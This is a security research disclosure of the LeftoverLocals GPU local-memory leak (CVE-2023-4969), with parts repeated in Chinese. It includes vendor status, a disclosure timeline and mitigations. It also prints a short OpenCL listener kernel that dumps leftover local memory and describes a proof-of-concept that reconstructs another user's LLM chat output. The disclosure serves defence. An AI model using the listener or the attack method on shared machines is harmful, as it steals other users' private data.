LeftoverLocals: Listening to LLM responses through leaked GPU local memory

We are disclosing LeftoverLocals: a vulnerability that allows recovery of data from GPU local memory created by another process on Apple, Qualcomm, AMD, and Imagination GPUs. LeftoverLocals impacts the security posture of GPU applications as a whole, with particular significance to LLMs and ML models run on impacted GPU platforms. By recovering local memory—an optimized GPU memory region—we were able to build a PoC where an attacker can listen into another user’s interactive LLM session (e.g., llama.cpp) across process or container boundaries, as shown below:
我们披露了 LeftoverLocals:该漏洞允许从 Apple、Qualcomm、AMD 和 Imagination GPU 上的另一个进程创建的 GPU 本地内存中恢复数据。LeftoverLocals 会影响整个 GPU 应用程序的安全态势,对LLMs在受影响的 GPU 平台上运行的 ML 模型尤为重要。通过恢复本地内存(一个优化的 GPU 内存区域),我们能够构建一个 PoC,攻击者可以在其中跨进程或容器边界监听另一个用户的交互式LLM会话(例如 llama.cpp),如下所示:

Figure 1: An illustration of how LeftoverLocals can be used to implement an attack on an interactive LLM chat session. The LLM user (left) queries the LLM, while a co-resident attacker (right) can listen to the LLM response.
图 1:如何使用 LeftoverLocals 对交互式LLM聊天会话实施攻击的图示。LLM用户(左)查询 LLM,而共存攻击者(右)可以侦听LLM响应。

LeftoverLocals can leak ~5.5 MB per GPU invocation on an AMD Radeon RX 7900 XT which, when running a 7B model on llama.cpp, adds up to ~181 MB for each LLM query. This is enough information to reconstruct the LLM response with high precision. The vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.
在AMD Radeon RX 7900 XT上,LeftoverLocals每次GPU调用可能会泄漏~5.5 MB,当在llama.cpp上运行7B模型时,每个LLM查询的总和为~181 MB。这些信息足以高精度地重建LLM响应。该漏洞凸显了 ML 开发堆栈的许多部分都存在未知的安全风险,并且尚未经过安全专家的严格审查。

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

Figure 2: LeftoverLocals logo: what leftover data is your ML model leaving for another user to steal?
图 2:LeftoverLocals 徽标:您的 ML 模型留下了哪些剩余数据供其他用户窃取?

This vulnerability is tracked by CVE-2023-4969. It was discovered by Tyler Sorensen as part of his work within the ML/AI Assurance team. Tyler Sorensen is also an assistant professor at UCSC. Since September 2023, we have been working with CERT Coordination Center on a large coordinated disclosure effort involving all major GPU vendors, including: NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination.
该漏洞由 CVE-2023-4969 跟踪。它是由 Tyler Sorensen 在 ML/AI 保证团队工作的一部分中发现的。泰勒·索伦森(Tyler Sorensen)也是UCSC的助理教授。自 2023 年 9 月以来,我们一直在与 CERT 协调中心合作,开展一项涉及所有主要 GPU 供应商的大规模协调披露工作,包括:NVIDIA、Apple、AMD、Arm、Intel、Qualcomm 和 Imagination。

As of writing, the status of the impacted vendors, Apple, AMD, and Qualcomm are as follows:
截至撰写本文时,受影响的供应商 Apple、AMD 和 Qualcomm 的状态如下:

  • Apple: Despite multiple efforts to establish contact through CERT/CC, we only received a response from Apple on January 13, 2024. We re-tested the vulnerability on January 10 where it appears that some devices have been patched, i.e., Apple iPad Air 3rd G (A12). However, the issue still appears to be present on the Apple MacBook Air (M2). Furthermore, the recently released Apple iPhone 15 does not appear to be impacted as previous versions have been. Apple has confirmed that the A17 and M3 series processors contain fixes, but we have not been notified of the specific patches deployed across their devices.
    Apple:尽管我们多次努力通过 CERT/CC 建立联系,但我们直到 2024 年 1 月 13 日才收到 Apple 的回复。我们在 1 月 10 日重新测试了该漏洞,其中似乎某些设备已被修补,即 Apple iPad Air 3rd G (A12)。但是,该问题似乎仍然存在于Apple MacBook Air(M2)上。此外,最近发布的苹果 iPhone 15 似乎没有像以前的版本那样受到影响。Apple 已确认 A17 和 M3 系列处理器包含修复程序,但我们尚未收到有关其设备上部署的特定补丁的通知。
  • AMD: We have confirmed with AMD that their devices remain impacted, although they continue to investigate potential mitigation plans. Their statement on the issue can be read here.
    AMD:我们已经与AMD确认,他们的设备仍然受到影响,尽管他们继续研究潜在的缓解计划。他们关于这个问题的声明可以在这里阅读。
  • Qualcomm: We received notice that there is a patch to Qualcomm firmware v2.07 that addresses LeftoverLocals for some devices. However, there may still be other devices impacted at this time. A Qualcomm representative has provided the following comment: “Developing technologies that endeavor to support robust security and privacy is a priority for Qualcomm Technologies. We commend Dr. Tyler Sorensen and Dr. Heidy Khlaaf from the AI/ML Assurance group at Trail of Bits for using coordinated disclosure practices and are in the process of providing security updates to our customers. We encourage end users to apply security updates as they become available from their device makers.”
    Qualcomm:我们收到通知,Qualcomm 固件 v2.07 有一个补丁,用于解决某些设备的 LeftoverLocals。但是,目前可能仍有其他设备受到影响。高通公司的一位代表提供了以下评论:“开发努力支持强大安全和隐私的技术是高通技术公司的首要任务。我们赞扬 Trail of Bits AI/ML 保障小组的 Tyler Sorensen 博士和 Heidy Khlaaf 博士使用协调的披露实践,并正在向我们的客户提供安全更新。我们鼓励最终用户在设备制造商提供安全更新时应用这些更新。
  • Imagination: Despite not observing LeftoverLocals ourselves across the Imagination GPUs that we tested, Google has confirmed that some Imagination GPUs are indeed impacted. Imagination released a fix in their latest DDK release, 23.3, made available to customers in December 2023.
    Imagination:尽管我们测试的 Imagination GPU 中没有观察到 LeftoverLocals,但 Google 已经确认某些 Imagination GPU 确实受到了影响。Imagination 在其最新的 DDK 版本 23.3 中发布了一个修复程序,该版本于 2023 年 12 月提供给客户。

Further details are discussed in “Coordinated disclosure,” and a list of tested and impacted devices can be found in “Testing GPU platforms for LeftoverLocals.” Other vendors have provided us the following details:
更多详细信息在“协调披露”中讨论,可在“测试 GPU 平台的 LeftoverLocals”中找到已测试和受影响的设备列表。其他供应商向我们提供了以下详细信息:

  • NVIDIA: confirmed that their devices are not currently impacted. One reason for this could be that researchers have explored various memory leaks on NVIDIA GPUs previously, and thus, they are aware of these types of issues.
    NVIDIA:确认其设备目前不受影响。造成这种情况的一个原因可能是研究人员之前已经探索了 NVIDIA GPU 上的各种内存泄漏,因此,他们意识到了这些类型的问题。
  • ARM: also confirmed that their devices are not currently impacted.
    ARM:还确认他们的设备目前没有受到影响。

While we did not hear a response from these vendors, we tested at least one GPU from them and did not observe that they were impacted: Intel.
虽然我们没有听到这些供应商的回应,但我们测试了他们至少一个 GPU,没有观察到它们受到影响:英特尔。

Exploit brief 漏洞利用简介

GPUs were initially developed to accelerate graphics computations. In this domain, performance is critical, and previously uncovered security issues have generally not had any significant consequences on applications. Historically, this entailed that GPU hardware and software stacks iterated rapidly, with frequent major architecture and programming model changes. This has led to complex system stacks and vague specifications. For example, while CPU ISAs have volumes of documentation, NVIDIA simply provides a few short tables. This type of vague specification has led to alarming issues, both previously and currently, as LeftoverLocals exemplifies.
GPU 最初是为了加速图形计算而开发的。在这个领域,性能至关重要,以前发现的安全问题通常不会对应用程序产生任何重大影响。从历史上看,这需要 GPU 硬件和软件堆栈快速迭代,频繁进行重大架构和编程模型更改。这导致了复杂的系统堆栈和模糊的规范。例如,虽然 CPU ISA 有大量的文档,但 NVIDIA 只是提供了几个简短的表格。这种模糊的规范导致了以前和现在的令人担忧的问题,正如 LeftoverLocals 所举例的那样。

Exploitation requirements 

This is a co-resident exploit, meaning that a threat actor’s avenue of attack could be implemented as another application, app, or user on a shared machine. The attacker only requires the ability to run GPU compute applications, e.g., through OpenCL, Vulkan, or Metal. These frameworks are well-supported and typically do not require escalated privileges. Using these, the attacker can read data that the victim has left in the GPU local memory simply by writing a GPU kernel that dumps uninitialized local memory. These attack programs, as our code demonstrates, can be less than 10 lines of code. Implementing these attacks is thus not difficult and is accessible to amateur programmers (at least in obtaining stolen data). We note that it appears that browser GPU frameworks (e.g., WebGPU) are not currently impacted, as they insert dynamic memory checks into GPU kernels. 

Unless the user inspects the application’s low-level GPU source-code, it is not possible for them to uncover if their application is utilizing GPU local memory; this matter is further complicated as the GPU code is often hidden deep in library calls, at low levels of deep software stacks (e.g., for ML). Overall, there are very limited ways to observe that an attacker is currently stealing data, or has stolen data. This attack hinges on the attacker reading uninitialized memory on the GPU, and while this is technically undefined behavior, it is not currently checked dynamically, or logged. Any additional defenses would be quite invasive, e.g., performing code analysis on GPU kernels to check for undefined behavior. 

We have released a PoC that exploits this vulnerability, and the sections below describe how it works.

User mitigations 

Given the lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended by modifying the source code of all GPU kernels that use local memory. Before the kernel ends, the GPU threads should clear memory (e.g., store 0s) to any local memory memory locations that were used in the kernel. Additionally, the users should ensure the compiler doesn’t remove these memory-clearing instructions away (e.g., by annotating their local memory as volatile), as the compiler may detect that the cleared memory is not used later in the kernel. This is difficult to verify because GPU binaries are typically not stored explicitly, and there are very few GPU binary analysis tools. Because of reasons like this, we note that this mitigation may be difficult for many users, and we discuss this further in “Mitigations” below. 

The vulnerability: LeftoverLocals 

In this section we describe the vulnerability, named LeftoverLocals, and the corresponding exploit in more detail. We then detail our testing campaign across a wide variety of GPU devices, which found that GPUs from AMD, Apple, and Qualcomm are vulnerable to LeftoverLocals. For those unfamiliar with GPU architecture and terminology, we provide a more in-depth level-setter in “Background: How GPUs work.” We also note that while GPU memory leaks are not new (a further discussion follows below), LeftoverLocals has demonstrated both deeper impact and wider breadth than previously discovered vulnerabilities. 

At a high level, we found that several GPU frameworks do not sufficiently isolate memory in the same way that it is traditionally expected in CPU-based frameworks. We have observed that on impacted GPUs, it is possible for one kernel—potentially from another user that is co-resident on the same machine—to observe values in local memory that were written by another kernel. Thus, an attacker who has access to a shared GPU through its programmable interface (e.g., OpenCL) can steal memory from other users and processes, violating traditional process isolation properties. This data leaking can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights. 

Previous academic work showed that NVIDIA GPUs leaked memory across processes through a variety of memory regions, including local memory. However, they examined only GPUs from NVIDIA (and the results from this paper may be part of the reason why we didn’t observe LocalLeftovers on NVIDIA GPUs). They also did not discuss the impact on widely deployed use-cases, such as ML. Other works have shown how GPUs leak graphics data, and that a co-resident attacker can reconstruct partial visual information from another process (see some examples documented herehere, and here). Despite these prior works, LeftoverLocals shows that many GPUs remain vulnerable to local memory leaks and that this vulnerability can be exploited in co-resident attacks on important ML applications.

Overall, this vulnerability can be illustrated using two simple programs: a Listener and a Writer, where the writer stores canary values in local memory, while a listener reads uninitialized local memory to check for the canary values. The Listener repeatedly launches a GPU kernel that reads from uninitialized local memory. The Writer repeatedly launches a GPU kernel that writes canary values to local memory. Below, we demonstrate how each of these operations is carried out. 

The Listener: The Listener launches a GPU kernel that reads from uninitialized local memory and stores the result in a persistent main memory region (i.e., global memory). This can be accomplished with the OpenCL kernel below: 

__kernel void listener(__global volatile int *dump) {
  local volatile int lm[LM_SIZE];
  for (int i = get_local_id(0); i < LM_SIZE; i+= get_local_size(0)) {
    dump[((LM_SIZE * get_group_id(0)) + i)] = lm[i];
  }
}

The keyword __kernel denotes that this is the GPU kernel function. We pass a global memory array dump to the function. Whatever the kernel writes to this array can be read later by the CPU. We statically declare a local memory array lm with a predefined size LM_SIZE (which we set to be the max size of local memory for each GPU we test). This program technically contains undefined behavior, as it reads from uninitialized local memory. Because of this, we use the volatile qualifier to suppress aggressive compiler optimizations that might optimize away the memory accesses. In fact, our code contains a few more code patterns included to further stop the compiler from optimizing away our memory dump. This process is more of a trial-and-error process than a science. 

For each loop iteration, the invocation (thread) is read from a location in local memory, and that location is dumped to a unique location in the dump array. The only tricky part of this code is the indexing, because local memory is disjointed across workgroups, so workgroup local IDs need to be mapped to a unique global ID in dump. The process utilizes built-in identifiers to achieve this, which are documented here. At the end of the kernel, dump contains every value that was stored in local memory when the listener kernel started executing. Because dump is in the global memory region, it can be examined by the CPU host code to check for canary values.

The Writer: On the other hand, the Writer launches a kernel that writes a canary value to local memory (for example, this work uses the value 123). We show an example of the OpenCL kernel code below:

__kernel void writer(__global volatile int *canary) {
  local volatile int lm[LM_SIZE];
  for (uint i = get_local_id(0); i < LM_SIZE; i+=get_local_size(0)) {
    lm[i] = canary[i];
  }
}

This code is very similar to the Listener, except that rather than dumping local memory, we are writing a value. In this case, we are writing a value from an array canary. We use an extra array so that the compiler does not optimize away the memory write (as it is prone to do with constant values). At the end of the kernel, the writer has filled all available local memory with the canary values. 

The CPU programs for both the Listener and the Writer launch their respective kernels repeatedly. In the case of the listener, at each iteration, the CPU analyzes the values observed in the local memory and checks for the canary value. On a server, these two programs can be run by different users or in different Docker containers. On a mobile device, these routines can be run in different apps. The apps can be swapped in and out of focus to alternate reading and writing. If the Listener can reliably read the canary values, then we say that the platform is vulnerable to LeftoverLocals. 

The following animation shows how the listener and writer interact, and how the listener may observe values from the writer if local memory is not cleared. 

Figure 3: A Listener and a Writer processes, where the writer stores canary values in local memory, while a listener reads uninitialized local memory to check for the canary values 

Listening to LLM responses

In this section, we provide an overview of how LeftoverLocals can be exploited by a malicious actor (an attacker) to listen to another user’s (the victim) LLM responses on a multi-tenant GPU machine, followed by a detailed description of the PoC.

At a high level, both actors are executed as co-resident processes. The attack process implements the listener described above, with the additional steps of comparing the stolen values to various fingerprints. The victim process is unknowingly the writer, where instead of canary values, the values being written are sensitive components of an interactive LLM chat session. The attack ultimately follows two steps:

  • The attack process fingerprints the model that the victim process is using by repeatedly dumping (i.e., listening) to the leftover local memory, which, in this scenario, consists of sensitive components of linear algebra operations used by the victim in the LLM model architecture.
  • The attacker then repeatedly listens to the victim’s process again, specifically seeking for an LLM to execute the output layer, which can be identified using weights or memory layout patterns from the earlier fingerprinting.

Note that the output layer is a matrix-vector multiplication with two inputs: the model weights, and the layer input—in other words, the values derived from the user input that propagated through the earlier levels of the deep neural network (DNN). Given that the model weights of the output layer are too large to comprehensively steal, an attacker can inspect available open-source models to fully obtain the weights through the exposed model fingerprint. We found that the second input to the last layer (i.e., the layer input) is subsequently small enough to fit into local memory. Thus, the entire layer input can be stolen, and the attacker can reproduce the final layer computation to uncover the final result of the DNN.

Figure 4: Steps of the PoC exploit whereby an attacker process can uncover data to listen to another user’s interactive LLM session with high fidelity 

We note that this is a fairly straightforward attack, and with further creativity and ingenuity, a threat actor may be able to construct further complex and sophisticated malicious scenarios that may compromise ML applications in more severe ways. Below we provide a detailed description of the PoC, and the configuration and testing carried out on various GPU platforms to uncover their susceptibility to LeftoverLocals. 

Our configuration: We outline our configuration in the table below. Our attack builds on the llama.cpp LLM due to its simplicity and variety of support for GPU acceleration. In our example we use a large discrete GPU that we found to be susceptible to LeftoverLocals: the AMD Radeon RX 7900 XT. We configure llama.cpp to use OpenCL for GPU acceleration, which uses the CLBLAST linear algebra library. We use the wizardLM-7B.ggmlv3.q5_0.bin model, which can be obtained from Hugging Face. This model was selected due to its reasonable size, which enabled rapid prototyping and analysis; however, this attack is transferable to many different models. In our threat model, we assume that the victim is using the LLM in an interactive chat session. 

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

Modification: The attack requires an optimized GPU implementation of matrix-vector multiplication. We found that the current matrix-vector multiplication in llama.cpp (which does not call into CLBLAST) is not implemented in an optimized idiomatic way. It stores partial dot product results in local memory and then combines them at the end. While there is a more complex approach using linear algebra to achieve our same results, for the simplicity of our PoC and demonstration, we replace the llama.cpp matrix-vector multiplication with our own that is more idiomatic (following best GPU programming programming practices).

Step 1—Fingerprinting the model: An attacker can fingerprint a model if it can listen to several inference queries from the victim. In our configuration, the GPU contains roughly 5MB of local memory. The model has roughly 33 layers, each of them consisting of a matrix multiplication operation. Matrix multiplication is often optimized on GPUs by using tiling: an approach that subdivides the matrices into small matrices, performs the multiplication, and then combines the results (as detailed here). In many optimized libraries, including CLBLAST, local memory is used to cache the smaller matrices. Thus, for every layer, the attacker can steal ~2.5MB of weights, and ~2.5MB of the inputs. While this is a significant amount of data, we note that it is not enough to reconstruct the entire computation. Many of these layers have weights and inputs that are 100s of MB large.

However, for a whole inference computation (33 layers), the attacker can steal around 80MB of the weights, which is sufficient to fingerprint the model (assuming the user is using an open-source model, such as one that can be found on Hugging Face). Given this, we assume that it is a straightforward task to fingerprint the model, and thus for the attacker to obtain the full model being used by the victim.

Step 2—Listening to the LLM output: The attacker can then turn their attention to the output layer of the DNN. In our configuration, we found that the output layer is a matrix-vector multiplication, rather than a matrix-matrix multiplication. The weights matrix is large (~128MB), but the input vector is quite small (~4KB). However, given that the attacker has fingerprinted the model in step 1, the attacker does not need to comprehensively steal the weights as they are available from the fingerprinted model.

Matrix-vector multiplication has a different GPU implementation than matrix-matrix multiplication. In the case where the input vector fits in local memory, the most performant implementation is often to cache the input vector in local memory, as it is used repeatedly (i.e., for repeated dot products). Because the input vector is stored entirely in local memory, the attacker can steal this entire vector. In determining whether the attacker has found local memory from the output layer, we discovered that the attacker could simply look for 4KB of floating point values with zeros on either side. In our testing, this unique fingerprint was associated with the output layer nearly every single time. For different models and different GPUs, this fingerprint will likely have to be recalibrated. 

Putting it together: With an attacker in possession of both the weights and the input vector, they can perform the final computation and obtain the result of the inference. This allows the attacker to reproduce the output of the victim’s LLM chat session with high fidelity, as demonstrated in the introduction. In practice, we tuned the attacker to dump the local memory very efficiently (that is, by using only a small number of threads and requiring a small amount of memory). This allows the attacker to listen to long chat queries with only a small number of noticeable artifacts. Some of the artifacts observed include: 

  • Duplicate tokens: This occurs when the attacker steals the same output layer twice due to circumstances such as the attacker process being scheduled twice in a row, thus the LLM was not scheduled to compute its next token. 
  • Missing tokens: This occurs when the attacker kernel isn’t scheduled at the right time, i.e., immediately after the output layer computation kernel. 
  • Incorrect tokens outputted occurring due to: 
  • the attacker mis-identifying a stolen set of data to be the last layer. In this case, it will print a junk token. 
  • Production of a token that is “close” to the original output, even if it is not exact. That is, the attacker may be unable to steal the exact token embedding at the target layer. This results in a corrupted token embedding which, when decoded, is semantically similar (in the word2vec sense) to the original token. As an example, in the GIF provided at the beginning, the attacker extracts the incorrect word “Facebook”, which is semantically similar to other Named Entities tokens (like “Google”, and “Amazon”) in the generated text. 

Despite these discrepant artifacts, the stolen text is more than sufficient to uncover the LLM response. Additionally, the attacker can be further tuned by, for example, having multiple threads launch the listener kernel or by having a more precise fingerprint of the last layer. 

Testing GPU platforms for LeftoverLocals

Given the diversity of the devices we tested, there exists several applications that can test for LeftoverLocals written in a variety of frameworks:

  • Vulkan Command Line: A command line application using Vulkan. The kernel is written in OpenCL and compiled to SPIR-V using clspv. It uses a simple Vulkan wrapper called EasyVK.
  • OpenCL Command Line: A command line application that uses the OpenCL framework.
  • Apple App: An Apple app that can be deployed on iOS or Mac OS. It targets the GPU using Apple’s Metal framework.
  • Android App: An Android app that uses Vulkan to target mobile GPUs. The code uses Vulkan’s C API (through EasyVK again) using JNI. The kernels are the same as in the Vulkan command line app: they are written in OpenCL and compiled to SPIR-V using clspv.

Using the above programs, we tested 11 devices spanning seven GPU vendors (and multiple GPU frameworks in some cases). We observed LeftoverLocals on devices from three of the vendors (Apple, Qualcomm, and AMD). The amount of memory leaked depends on the size of the GPU. Larger GPUs contain more physical memory, and thus, leak more data. For the larger GPUs (e.g., an AMD Radeon RX 7900 XT), we found that we can leak over ~5MB per kernel. The following tables outlines the system info for the GPUs we were able to observe LeftoverLocals (QC refers to Qualcomm): 

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

For some devices, specifically those from Arm, we were not able to observe the canary value from the Writer in the Listener, but we did observe non-zero data. Representatives from Arm reviewed our observations and concluded that although these values are not zero, they are not from a memory leak. 

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

Additionally, we tested some GPUs from NVIDIA, Intel, and Imagination. For these devices, we observed only zeros in local memory, and thus did not observe LeftoverLocals. It is unclear if all their devices are not impacted. For example, although we did not observe the issue on our Imagination device, Google notified us that they were able to observe it on other Imagination devices. 

LeftoverLocals: Listening to LLM responses through leaked GPU local memory

The following YouTube video demonstrates the different interfaces and examples of LocalLeftovers—namely the LLM PoC attack, covert communication channels, and searching for canary values—on a few different platforms using a few different applications.

Vulnerable environments: An attack program must be co-resident on the same machine and must be “listening” at the same time that the victim is running a sensitive application on the GPU. This could occur in many scenarios: for example, if the attack program is co-resident with the victim on a shared cloud computer with a GPU. On a mobile device, the attack could be implemented in an app or a library. Listening can be implemented efficiently, and thus can be done repeatedly and constantly with almost no obvious performance degradation.

Next, we briefly discuss other environments where GPUs are either deployed or where an attacker might have access to sensitive information. Although it appears that some current systems (e.g., WebGPU) are not currently impacted, the ever-growing prevalence of ML and the diversity of modern GPUs mean that the next iteration of these systems (or other near-future systems) may be severely compromised by these types of vulnerabilities.

  • Cloud providers: Cloud providers (e.g., AWS and Azure) are unlikely to provide shared GPU instances, especially if users have dedicated access to the GPU machine. In other cases, GPUs could be shared using very conservative GPU VM technology (such as NVIDIA’s vGPU or MxGPU), which physically partitions the GPU and therefore prevents users from sharing GPU resources (e.g., local memory). Given this, many current cloud GPU systems may not currently be vulnerable to LeftoverLocals; however, we do not have conclusive evidence to determine this given the general lack of visibility into the specification and implementation of these systems. We note that we have observed LeftoverLocals on multi-user Linux servers, as well as on desktop (Windows and Mac) systems through traditional multi-processing. This includes Docker containers on these systems. 
  • Mobile applications: In our experiments and explorations in the mobile domain, we were able to run concurrent GPU processes (from different apps on iOS or Android) only in very specific instances. That is, we were not able to run a GPU process (e.g., from a malicious listener app) in the background while other apps (e.g., the victim) were run in the foreground. As with our analysis of cloud providers, we were unable to find clear documentation that explicitly detailed these constraints, and so we cannot definitively claim whether they are vulnerable. However, as seen in the video above, LeftoverLocals can be exploited either when a malicious listener app is run side-by-side with a victim app, or if the malicious listener app is quickly swapped from the background into the foreground from a victim app. 
  • Remote attacks: We preliminarily investigated the possibility of attacks originating from websites (e.g., those hosted by a remote attacker). To our knowledge, web applications do not have the low-level features required to listen to local memory using GPU graphics frameworks, such as WebGL. We note that the new WebGPU framework does provide low-level capabilities that allow a webpage to access local memory. Conservatively, WebGPU initializes and performs dynamic array bounds checking on local memory (and global memory), which mitigates this vulnerability. However, these checks cause significant overhead, as documented in discussions like this one. To test this further, our code repo contains a simple listener in WebGPU. As expected, we have only observed zeros in local memory, even on devices that are vulnerable to LeftoverLocals through other frameworks. However, GPU compilers are known to be fragile, and it is not difficult to imagine finding a compiler bug that could somehow bypass these checks (especially using fuzzing techniques). Our position is that LocalLeftovers should be addressed at a lower level (e.g., the driver). 

How GPU vendors can resolve this vulnerability: To defend against LocalLeftovers, GPUs should clear their local memory between kernel calls. While this could cause some performance overhead, our experiments show that many GPU vendors (e.g., NVIDIA, Intel) currently appear to provide this functionality. It even appears that some of this functionality is provided for impacted GPUs. For example, Mesa drivers for AMD GPUs clears local memory after a compute kernel launch. However, this approach has a fundamental flaw that makes it vulnerable to LeftoverLocals: this memory wipe is done with a separate kernel, thus, the GPU kernel queue may contain a malicious listener between the computation kernel and the local memory wipe, allowing the listener to steal memory. Instead, the computation kernel and the local memory wipe need to occur atomically, i.e., without allowing any other kernel to be interleaved between them. Otherwise, a user may attempt to preemptively defend themselves against LeftoverLocals as described in the next section. 

Mitigations: In light of a lack of comprehensive patches across impacted GPU vendors, LeftoverLocals can be defended by modifying the source code of all GPU kernels that use local memory. As we’ve previously noted, before the kernel ends, the GPU threads should store 0 to any local memory locations that were used in the kernel. Given that GPU tasks are typically interleaved at the kernel boundary, this will prevent another user from being able to read leftover values. We note that this mitigation may be difficult for many users, especially because GPU code is often buried deep in complex software stacks (e.g., for ML). Furthermore, the GPU code may be part of a highly optimized library (e.g., ML linear algebra routines). In these cases, it is very difficult to identify how local memory is used, and even more difficult to modify the kernel to zero it out. It may be possible to augment a compiler to add this functionality, similar to how WebGPU handles GPU memory accesses (described above). These mitigations do have a performance overhead that should be taken into account. Another blunt mitigation involves simply avoiding multi-tenant GPU environments. 

Impact on LLMs and GPU platforms

LLM security

Our PoC attack examines only one application: an interactive open-source LLM session. However, with a little creativity, attackers could likely target many GPU applications, including those used within privacy-sensitive domains. Our motivation stems from the recent increased use and support of open-source models, often accompanied by claims that their “openness” inherently entails safety and security through transparency. A recent article in Nature even alleges that only open-source generative AI models can “safely” revolutionize health care, a safety-critical domain. Yet, even if open-source models provide the opportunity to be rigorously audited and assessed (which they have yet to be), their deployment still hinges on a closed-source stack (i.e., GPUs). And as demonstrated by LeftoverLocals, open-source LLMs are particularly susceptible to our vulnerability given our ability to fingerprint these models to obtain remaining weights as needed. Indeed, we have already observed announcements regarding the deployment of open-source models in collaboration with impacted GPU vendors, including Hugging Face’s collaboration with AMDLamini’s deployment on AMD GPUs, and the Qualcomm and Meta partnership for edge devices.

Generally, the introduction of ML poses new attack surfaces that traditional threat models do not account for, and that can lead to implicit and explicit access to data, model parameters, or resulting outputs, increasing the overall attack surface of the system. It is crucial to identify and taxonomize novel classes of failure modes that directly impact ML models, in addition to novel threats that can compromise the ML Ops pipeline, as we have demonstrated with LeftoverLocals. We discuss GPU-specific threat implications in the following section. 

GPU providers, applications, and vendors 

While many platforms are not currently impacted (see Vulnerable environments), we emphasize that the GPU compute landscape is evolving rapidly. As some examples: a growing number of GPU cloud providers have various policies and available configurations; and GPU programming frameworks, such as Vulkan and Metal, are well-supported on mainstream platforms, and can be used in apps without requiring extra privileges. While these developments are exciting, they increase the threat potential of GPU vulnerabilities, as LeftoverLocals illustrates. As far as we are aware, there is no unified security specification for how GPUs are required to handle sensitive data, and no portable test suite to check if systems are vulnerable to simple memory leaks, like LeftoverLocals. Thus, GPU compute environments should be rigorously scrutinized when used for processing any type of sensitive data. 

As mentioned above, while we focus on LLM applications, GPU local memory is one of the first tools that a GPU developer uses when optimizing an application. Although other attacks would likely require analyzing the victim’s GPU kernel code to identify local memory usage, other attacks are likely possible in GPU compute domains, such as image processing and scientific computing. It will likely be increasingly difficult for users to detect and defend against these attacks since it’s unlikely they will know if their application is vulnerable to LeftoverLocals; this would require knowing the details of the exact GPU kernel code, which are often hidden away in highly optimized linear algebra libraries (e.g., CLBLAST). Additionally, an overall lack of specification in up-and-coming GPU platforms makes it difficult to determine whether the compiler or runtime will use impacted memory regions without the user knowing. For example, Apple GPUs have a new caching mechanism, called dynamic caching, that does not have a clear specification regarding if local memory regions are being used for other purposes. 

Coordinated disclosure 

Since September 2023, we have been working CERT/CC on a large coordinated disclosure involving all major GPU vendors, including NVIDIA, Apple, AMD, Arm, Intel, Qualcomm, and Imagination. Trail of Bits provided vendors a total of 125 days to test their products and provide remediations. The coordination gradually grew to include software stakeholders, including Google, Microsoft, and others, which allowed us to understand how LocalLeftovers impacts privacy requirements and impact at different stages in the ML supply chain. Apple did not respond or engage with us regarding the disclosure. 

A high-level timeline of the disclosure is provided below: 

  • September 8, 2023: Trail of Bits submitted report to the CERT/CC 
  • September 11, 2023: CERT/CC acknowledged the submission of LeftoverLocals and began the process of vendor outreach and CVE assignment with a preliminary disclosure date of December 11, 2023 
  • September 14, 2023: AMD acknowledged the CERT disclosure 
  • September 15, 2023: Qualcomm acknowledged the CERT disclosure 
  • September 22, 2023: The case report was shared with Khronos and OpenCL working group 
  • September 29, 2023: NVIDIA acknowledged disclosure and confirmed they were not affected by the vulnerability 
  • November 22, 2023: ToB extended release of embargo to January 16, 2024 to accommodate for vendor requests for further time 
  • January 11, 2024: We received a notice that Qualcomm provided a patch to their firmware that addresses this issue only for some of their devices. Additionally, Google noted that ChromeOS Stable 120 and LTS 114 will be released on January 16 to include AMD and Qualcomm mitigations. 
  • January 13, 2024: Apple confirmed that the A17 and M3 series processors contain fixes to the vulnerability. 
  • January 14, 2024: Google notified us that they observed that that some Imagination GPUs are impacted. 
  • January 16, 2024: Embargo lift and public disclosure of LeftoverLocals 

Moving forward 

Now that GPUs are being used in a wide range of applications, including privacy sensitive applications, we believe that the wider GPU systems community (vendors, researchers, developers) must work towards hardening the GPU system stack and corresponding specifications. This should be accomplished through robust, holistic specifications that describe both GPU programs’ behavior and how GPU devices integrate with the rest of the system stack (e.g., the OS or hypervisor). Furthermore, these specifications should be rigorously tested to account for the diversity of GPU systems and safety requirements of diverse application domains. Looking forward, a wide variety of new AI chips are being developed and will require rigorous security analysis. 

There are positive developments in this direction. For example, AMD’s ROCm stack is open, and thus available for independent rigorous evaluation, and the Khronos Group has safety critical specification groups. Additionally, cross-vendor programming frameworks, such as Vulkan, have been incredibly useful for writing portable test suites, as opposed to single-vendor programming frameworks. 

While GPU security and privacy guarantees are scattered and scarce, the Vulkan specification outlines a reasonable definition of security for GPU platforms to adhere to—a definition that several platforms clearly violate, as our results show: 

… implementations must ensure that […] an application does not affect the integrity of the operating system[…]. In particular, any guarantees made by an operating system about whether memory from one process can be visible to another process or not must not be violated by a Vulkan implementation for any memory allocation. 

Given the role of Khronos specifications in this result, we included the Khronos Group in the coordinated disclosure. They connected us with representatives of various impacted vendors, and engaged in fruitful discussions about security specifications and testing. Prior to the release, Khronos released this statement in support of this work: 

Khronos welcomes the work by Tyler Sorensen and Trail of Bits to increase security around the usage of Khronos APIs and have been working closely with them for several months to ensure that API implementers are aware and able to act on any issues. Khronos is also diligently exploring additional actions relating to API specifications, conformance testing, and platform vendor cooperation to continually strengthen safety and security when using Khronos compute and rendering APIs. – Neil Trevett, Khronos President
Khronos 欢迎 Tyler Sorensen 和 Trail of Bits 为提高 Khronos API 使用的安全性所做的工作,并与他们密切合作了几个月,以确保 API 实现者了解并能够对任何问题采取行动。Khronos 还在努力探索与 API 规范、一致性测试和平台供应商合作相关的其他行动,以在使用 Khronos 计算和渲染 API 时不断加强安全性。– Neil Trevett,Khronos 总裁

With the dust settling, our position is the following: given the wide diversity of GPUs and their critical importance in enabling machine learning applications, these devices, and their ecosystems, are in need of (1) a detailed threat model that considers the various types of data processed on GPUs and how this data might be compromised; (2) an exploration of the GPU execution stack to determine where and how GPU security properties should be specified and implemented; and (3) significant testing and auditing to fortify GPU ecosystem, which is the computational foundation of machine learning.
